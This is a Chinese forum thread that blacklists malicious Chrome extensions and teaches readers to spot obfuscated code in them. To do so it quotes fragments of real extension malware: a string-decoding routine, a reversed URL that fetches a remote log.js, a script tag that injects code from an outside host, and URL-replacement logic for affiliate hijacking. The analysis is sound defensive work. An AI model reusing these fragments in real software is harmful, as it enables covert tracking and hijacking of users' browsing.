搜索
查看: 101019|回复: 159
收起左侧

[推荐资源] (停止更新)Chrome商店恶意扩展反馈集合帖

  [复制链接]
narutovsop
发表于 2013-5-30 13:30:34 | 显示全部楼层 |阅读模式
本帖最后由 narutovsop 于 2015-8-3 10:55 编辑

因个人问题,此帖不再更新



   
最近有会员反映crxmouse扩展有上传用户数据的问题,我简单的做了一下修改,删除了两个跟上传数据有关的无用脚本tr_advanced.js和tr_simple.js等,需要的可以下载使用,如还有上传数据最好是pm我
extension_2_7_6.7z (124.8 KB, 下载次数: 3429)

评分

参与人数 4技术 +1 经验 +40 人气 +3 收起 理由
samtogo + 40 版区有你更精彩: )
sungan01 + 1 版区有你更精彩: )
zs353 + 1 + 1 版区有你更精彩: )
107 + 1 gj

查看全部评分

narutovsop
 楼主| 发表于 2013-5-30 13:33:26 | 显示全部楼层
本帖最后由 narutovsop 于 2014-12-12 09:49 编辑

黑名单(12月12日更新)
总结:作者名字为xx推荐的建议多留心

另外:目前来看这些恶意扩展以视频广告过滤相关的居多,故还是使用主楼推荐的视频过滤扩展或脚本比较稳妥


作者:tools for chrome的扩展
谷歌快速翻译(中-英)

作者:www.pigtools.cn的扩展
小猪广告杀手 (Pig Ad Killer)

作者:优酷去广告的扩展
优酷去广告Html5

作者:chrome大师的扩展
优酷土豆广告去除

作者:猎豹的扩展
视频广告屏蔽 嗅探 下载

作者:插件增强|汉化|破解的扩展
迅雷、快车、旋风专用链自动转换

作者:微信的扩展
悬停预览

作者:chrome系统的扩展
迅雷-全系列迅雷原版-迅雷精简版下载支持-迅雷下载(目前的版本可能把恶意代码去掉了,但避免以后的版本再加上,暂不将此扩展移除出黑名单)

作者:微信的扩展
夜间模式

作者:Ext Dev的扩展
视频广告屏蔽 + 嗅探 + 下载(3合1)超强版

作者:谷歌推荐的扩展
优酷视频无广告
收藏夹书签自动整理
心理测试大全
收藏夹一触即发

作者:谷歌音乐推荐的扩展
豆瓣电台
音悦台
虾米音乐
虾米电台
百度随身听
酷狗音乐
多米电台
酷狗电台
酷我音乐

作者:谷歌音乐盒的扩展
豆瓣电台
网络音乐电台
音悦台
百度音乐随身听

作者:www.haitaods.com的扩展
海淘大师 6pm 亚马逊二合一插件

作者:www.googleplugin.com的扩展
https://chrome.google.com/websto ... ww.googleplugin.com
(这个作者www .googleplugin.com的扩展我只看了前面的10个,都有可疑代码,详述http://bbs.kafan.cn/forum.php?mo ... 7003&fromuid=735385,不过现在扩展貌似被下架了或是其他什么情况,在商店里找不到了,如果大家再遇到这个作者的作品要慎重一些了)

作者:www.youkuchajian.com的扩展
视频广告杀手-优酷广告杀手土豆广告杀手,爱奇艺广告

作者:视频去广告专家的扩展
Adblock中国加强版
搜狐视频去广告
优酷 土豆 爱奇艺 搜狐去广告
视频广告杀手-优酷广告杀手土豆广告杀手,爱奇艺广告
土豆广告去除
爱奇艺广告去除
优酷全能助手

作者:来自Google推荐的扩展
自动隐藏下载栏
搜狐视频去60秒广告
视频广告杀手-优酷广告杀手土豆广告杀手,爱奇艺广告

作者:优酷土豆的扩展
Sorry Youku 加强版
opengg clean player 去广告加强版
土豆屏蔽广告
优酷土豆去广告

作者:优酷土豆广告去除的扩展
酷6广告去除
土豆广告去除
视频广告杀手-优酷广告杀手土豆广告杀手,爱奇艺广告

作者:豆瓣UX小组的扩展
PPS视频去45秒广告
爱奇艺去45秒广告


鲁夫的耻辱柱

优酷广告杀手已下架





此前有不少,不过有不少已经下架,所以如果大家反馈的话仅反馈还在商店里蹦达的吧



待补充。。。。。

欢迎大家补充反馈



    另外,脚本中也有一些不良脚本,大部分脚本会在http://userscripts.org/scripts下载,这里集合了大量的优质脚本,极大的扩展了Chrome的功能,但由于审核比商店还松,所以垃圾脚本也很多,由于脚本数量太多太杂,且发布不能代表官方,这里就不对这些的脚本进行讨论了,仅针对官方商店的扩展进行讨论。

    不过我在最近浏览userscripts网站时发现一个作者在短时间里发布了大量的脚本,名称各不相同,仅从名称和介绍来看很多都是很有用的,但所有这些脚本的内容都一样,都是作用在facebook网站,也就是说脚本的功能跟脚本的名称和介绍无半点关系,由于我没用过facebook,不清楚这个脚本的具体作用,但从代码上看多半是用来刷某些数据用的,这个作者名字为Facebookr,他的所有脚本http://userscripts.org/users/442265/scripts,和Facebook ready,他的所有脚本http://userscripts.org/users/442265/scripts,和Jack Powel,他的所有脚本http://userscripts.org/users/442265/scripts,建议大家慎用,同时也提醒大家在下载脚本时尽量使用有详细介绍,并且能从扩展名字和介绍就能大致知道这个脚本大致会在哪些网站生效,然后看看Source Code标签里代码的include字段对应的网站是否跟自己猜测的类似,最后再进行选用。
narutovsop
 楼主| 发表于 2013-5-30 13:38:32 | 显示全部楼层
本帖最后由 narutovsop 于 2013-6-13 17:24 编辑

我目前遇到的恶意扩展主要采用如下一些方式来执行可疑代码:

一、js没有对代码进行任何特殊处理,直接可以从代码里读出所执行的功能,如果你对代码一窍不通的话,可以通过搜索关键字来了解是否有可疑行为,使用文本编辑软件(我个人用notepad2,可以通过颜色看出文本的类型,如字符串显示为绿色,正则表达式为棕色还是土黄色?)来查看代码,主要查看绿色的字符串和棕色的正则式,不需要懂正则式,因为通常他们不会把要匹配的字符串或网址在正则式里进行特殊处理,所以跟字符串一样能很容易的看出有效内容,然后看这些字符串里是否含有checkout、account、shop等明显的涉及网银、帐号等的字符或是一些如淘宝、天猫、亚马逊等交易类网站的网址关键字,如果有的话就要慎重使用了,具体是否危险,可以看看代码里是否有replace之类的替换方法来替换链接里的关键字,另外看看代码里有没有加载第三方网址和js,通常是http://开头的字符串,具体这些第三方网址或js是否危险只能查看这些网页或js的源码来判断了

二、将关键功能的代码顺序打乱,根据某个自定义函数来把这样的代码进行组合并执行。这样的代码可以在notepad2查看,看看里面的字符串数据:

如果字符串类似base64;image/png,…之类的表示的是base64编码的图片,这是安全的;

如果字符串很长,无标点,无符号,只有a-z0-9字符的话通常是安全的(当然也有可能是被很复杂的方法进行了编码或排序,这种情况下我也没办法了);

如果字符串里含有标点或有%、0x、\u、\x等之类的话很有可能是对字符串进行了编码转换,这个时候可以看看这个字符串是否使用了一个自定义的函数进行处理:

1、例如视频广告杀手-优酷广告杀手土豆广告杀手,爱奇艺广告https://chrome.google.com/websto ... kgfpipnonjehcmcieeo扩展,里面的my.js有个
  1. if (tab.url.indexOf(dd('w.wdwgsutre.rcoom','cf84')) > -1 &&tab.url.indexOf(dd('atidc','c822')) > -1&&tab.url.indexOf(dd('cmohreknli','38c4'))< 0&&tab.url.indexOf(dd('hceckout','a16d'))< 0&&tab.url.indexOf(dd('ocucant','ccbd'))< 0&&tab.url.indexOf(dd('tphts3/%A/','7ac1'))< 0&&tab.url.indexOf(dd('sohpping','33bd'))< 0&&tab.url.indexOf(dd('feudalt','a4a9'))< 0)
复制代码
,被’’引号引用的部分就是字符串,这些字符串很乱,不是正常的单词,而这个字符串被一个dd函数调用,而查看js里的dd函数,如下
  1. function dd(a,k){var arr = a.split('');var str_key='';var key=parseInt('0x'+k).toString();for(i in key){str_key+=‘$’+key[i];}var ret=a['erlpcae'['replace'](/(.)(.)/g, '$2$1')](/(.)(.)(.)(.)(.)/g,str_key);return unescape(ret);};
复制代码
函数的具体功能不需要太在意,可以简单的看出这个函数的功能仅仅是对字符串本身进行转换处理,而不是以字符串为参数执行某一些实际有用的操作,通常来说如果作者是想防抄袭的话会对代码的执行流程和代码指令等进行加密或重新编码或重排列或其他更高级的方法来隐藏指令,而不是仅对字符串参数进行处理,所以这个时候基本可以看出这个扩展想要执行一些不想让人知道的操作,说明这个脚本的功能很可疑,如果想要进一步的查看到底是执行了哪些操作,可以在Chrome的审查元素-console栏里复制那个dd函数,然后例如要查看
dd('w.wdwgsutre.rcoom','cf84')
所代表的内容,就在那个dd函数之后添加
console.log(dd('w.wdwgsutre.rcoom','cf84'))
即添加到console.log()里回车即可打印出
  1. www.drugstore.com
复制代码
,其他类似的都可以采用这样的方法得到原始代码,然后再对代码进行排查;

2、例如还是这个扩展,里面的background.js里有个
a.open("GET","sj.gol/gol/moc.oatiahi5.emorhc//:ptth".split("").reverse().join(""),!0);
大家可以看出来这个字符串很像更网址,但顺序很乱,实际上这个字符串是把一个网址倒序排列了,然后使用split(“”)把字符串分割放到数组里,再使用reverse()(用来倒序排列数组)函数来把数组再倒序排列,最后用join(“”)把数组组合成字符串,简单的方法可以把"sj.gol/gol/moc.oatiahi5.emorhc//:ptth".split("").reverse().join("")放到console.log()里打印出
  1. http://chrome.5ihaitao.com/log/log.js
复制代码
这个结果;

3、例如还是这个扩展,里面的showicon.js里有个var _$=的定义,后面的内容可以看到是由很多网址或关键字组成的数组,然后后面出现了多个replace、chrome.webRequest.onBeforeRequest.addListener等方法用来替换指定的网站或关键字,(这里简单的说下,扩展通过manifest文件来定义某个html或js的作用,如果js是在content_scripts字段里,说明这个js是直接加载在网页里的,即只能在指定网页里加载生效;如果html或js由这个html调用在popup里是由通过点击来触发操作;如果html或js或这个js由这个html调用的被放在background字段里,说明这个js是一个独立进程,且这个js不会对网页内容执行操作,(除非js里使用了chrome.tabs.executeScript方法在指定标签注入代码,或使用chrome.extension.onRequest.addListener等方法与js进行信息传递,一般比较少见,这里不做更多讨论),这个js通常是用来对浏览器全局进行操作的,如对各个标签进行一些操作:新建标签、修改、关闭等,地址栏或工具栏添加图标和点击触发一些操作等,添加鼠标右键菜单,修改地址栏里的地址等,而这个showicon.js正在background进程里,并且其他background的代码里也没有chrome.tabs.executeScript和chrome.extension.onRequest.addListener等,所以里面的代码不会对网页内容产生影响)其中replace方法很显然是对地址栏里的地址进行替换,这个替换过程是显式的,即可以看到明显的跳转和页面刷新过程,而其中也使用了chrome.webRequest.onBeforeRequest.addListener和webRequest.onBeforeSendHeaders.addListener来直接修改资源请求的数据头,也就是跟referchange扩展的方法一样,来在后台隐式的加载替换后的链接,当然这里不是说replace和webRequest.onBeforeSendHeaders.addListener等方法有问题,而是说这个js执行的操作是把用户的操作转向了_$里定义的网址,而从这些网址和要替换的关键字可以看出这个js很危险;

4、例如还是这个扩展,里面的runtb.js,前面的部分应该是jquery代码,有点复杂,看不懂,但后面的
$(document).ready(function(){
var href = location.href;
console.log(href);
if( href.indexOf("www.baidu.com") > 0)           {addbaidu();}
else if( href.indexOf("tieba.baidu.com/p/") > 0)     {addtieba();}
else if(href.indexOf("google.com.hk") > 0)   {addgg();}
else if(href.indexOf("hao123.com") > 0)   {addhao123();}
else if(href.indexOf("hao.360.cn") > 0)   {add360();}
else if(href.indexOf("2345.com") > 0)   {add2345();}
else if(href.indexOf("www.bilibili.tv") > 0)   {addbb();}
});
部分以及下面的具体的addx函数可以很清楚的看出来是要在这些网站里添加一个网站的推广,既然是推广我就不给出具体网址了,大家可以自己去扩展里看把;

5、例如还是这个扩展,里面的contentScripts.js,前面的代码貌似没什么问题,但在最后在页面里加载了一个第三方的js
var s = document.createElement('script');
        s.type = 'text/javascript';
         s.async = true;
        s.src = 'http://chrome.5ihaitao.com/cnzz.js';
        document.body.appendChild(s);
(说实话,真的很感谢这个作者让我对代码的编写艺术有了更深的理解);

6、例如有的js里有个eval(重新运算求出参数的内容),而里面的内容比较复杂也比较乱,不是普通的字符串,这个时候可以把eval改成console.log,然后把整个代码复制到审查元素里即可打印出代码的本来面目,有的可能进行了多次转换,如果打印出的代码里仍有eval就继续改成console.log来打印,最终会得到正常形式的代码,这里有详述http://bbs.kafan.cn/forum.php?mo ... &fromuid=735385

7、例如爱奇艺去45秒广告,里面bg.js的内容很复杂,倒不是说代码执行的操作复杂,而是把所有的关键指令都进行了编码(例如\uXXXX、\xXX之类的格式)并放在一个自定义的数组里,然后在下面的代码里通过数组索引来调用,可以把这个数组整个放到console.log里打印出正常的字符串,然后再根据下面的数组索引来把相应指令替换进去,过程比较繁琐,替换完后就可以看看是否有replace等替换操作了。而这个js里的数组打印出来后可以看到它请求了一个外部的js http://mnybag.b0.upaiyun.com/bootstrapmin.js,在浏览器里打开这个js后得出的代码格式与这个bg.js一样,需要转换一下数组里的编码,而这个js里有请求两个外部的地址:http://baidu-analytics.com/minad_baidu.jshttp://s.click.taobao.com/t_js。。。;

8、


目前我遇到的类型就这些,其他的待补充。。。

欢迎大家指正。


另外,还有一些经验,打开扩展界面多看看介绍(非中文版的扩展相对而已一般会安全些,因为老外又不会对淘宝等返利有兴趣吧,当然这也不是绝对的),然后看评价,通常来说,扩展是开源的,多半也是非盈利性质的,也就是说大部分作品的靠的是作者的热心,所以他们通常也就不会王婆卖瓜自卖自夸了,评论里的内容多半差别就会比较大,因为毕竟大家难得登录商店(你懂的)也就不会像逛论坛、贴吧之类的去灌水吧,回复的评论自然是自己的看法了,那么如果评论里清一色的只夸扩展,而很少使用反馈,且这样的评论很集中,这就可能是有人在刷好评了

评分

参与人数 1人气 +1 收起 理由
闻仲 + 1 o(︶︿︶)o

查看全部评分

闻仲
发表于 2013-5-30 14:22:31 | 显示全部楼层
写的不错,啥时跳槽到火狐来







    蹉跎过,消磨过,最是光阴化浮沫
    ————————————————————————————————————————————————————————————2013年5月30日 14:22:29
    a8181811
    发表于 2013-5-30 14:23:53 | 显示全部楼层
    黑名单太多了,估计没法写全
    samtogo
    发表于 2013-5-30 14:28:16 | 显示全部楼层
    写的不错,啥时跳槽到火狐来
    narutovsop
     楼主| 发表于 2013-5-30 14:46:05 | 显示全部楼层
    闻仲 发表于 2013-5-30 14:22
    写的不错,啥时跳槽到火狐来

    火狐换内核我就去
    narutovsop
     楼主| 发表于 2013-5-30 14:48:07 | 显示全部楼层
    a8181811 发表于 2013-5-30 14:23
    黑名单太多了,估计没法写全

    所以主楼为白名单,让大家首先选用可信的扩展,二楼放黑名单,有就添加呗,反正有了推荐的扩展一般也就不会再用功能相仿的山寨恶意扩展了
    narutovsop
     楼主| 发表于 2013-5-30 14:49:07 | 显示全部楼层
    samtogo 发表于 2013-5-30 14:28
    写的不错,啥时跳槽到火狐来

    opera换内核了,等先把opera区吞并了再去
    a8181811
    发表于 2013-5-30 14:50:41 | 显示全部楼层
    narutovsop 发表于 2013-5-30 14:48
    所以主楼为白名单,让大家首先选用可信的扩展,二楼放黑名单,有就添加呗,反正有了推荐的扩展一般也就不 ...

    嗯,放行白名单的办法可行。商店里真是太不让人省心了
    您需要登录后才可以回帖 登录 | 快速注册

    本版积分规则

    手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

    Copyright © KaFan  KaFan.cn All Rights Reserved.

    Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2017-11-21 21:55 , Processed in 0.055395 second(s), 6 queries , MemCached On.

    快速回复 返回顶部 返回列表